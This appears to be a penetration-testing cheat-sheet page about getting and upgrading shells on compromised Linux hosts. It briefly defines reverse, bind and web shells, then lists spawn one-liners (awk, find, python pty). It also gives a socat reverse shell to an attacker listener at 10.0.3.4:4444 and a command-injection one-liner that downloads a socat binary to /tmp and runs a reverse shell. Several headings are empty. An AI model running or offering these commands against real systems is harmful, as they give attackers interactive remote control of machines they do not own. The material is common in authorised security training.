Spawn a shell
All about shells
| Shell Type | Description |
|---|---|
Reverse shell |
Initiates a connection back to a "listener" on our attack box. |
Bind shell |
"Binds" to a specific port on the target host and waits for a connection from our attack box. |
Web shell |
Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command. |
Webshell is a script written in a language that is executed by a server. Web shell are not fully interactive.
Resources for upgrading simple shells
Sidenote: Also, you can generate a webshell by using msfvenom
Clasification of shells
On a Linux system, the shell is a program that takes input from the user via the keyboard and passes these commands to the operating system to perform a specific function.
There are three main types of shell connections:
| Shell Type | Description |
|---|---|
| Reverse shell | Initiates a connection back to a "listener" on our attack box. |
| Bind shells | "Binds" to a specific port on the target host and waits for a connection from our attack box. |
| Web shells | Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command. |
Spawn a shell
awk
bash
# Upgrade shell with running these commands all at once:
SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm
find
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
# This use of the find command is searching for any file listed after the -name option, then it executes awk (/bin/awk) and runs the same script we discussed in the awk section to execute a shell interpreter.
find . -exec /bin/sh \; -quit
# This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.
lua
msfvenom
You can generate a webshell by using msfvenom
Also msfvenom can use metasploit payloads under “cmd/unix” to generate one-liner bind or reverse shells. List options with:
perl
python
# using python for a pseudo terminal
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c "import pty;pty.spawn('/bin/bash')"
ruby
ssh
socat
# Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
If socat isn’t installed, there exists other options. There are standalone binaries that can be downloaded from this Github repo: https://github.com/andrew-d/static-binaries
With a command injection vuln, it’s possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
On Kali, run:
and you’ll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It’s a full terminal.
stty options
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty size
stty rows <num> columns <cols>
# In one line:
reset; export SHELL=bash; export TERM=xterm-256color; stty rows <num> columns <cols>
VIM
VIM escape:
Last update: 2024-10-24 Created: January 26, 2023 23:15:59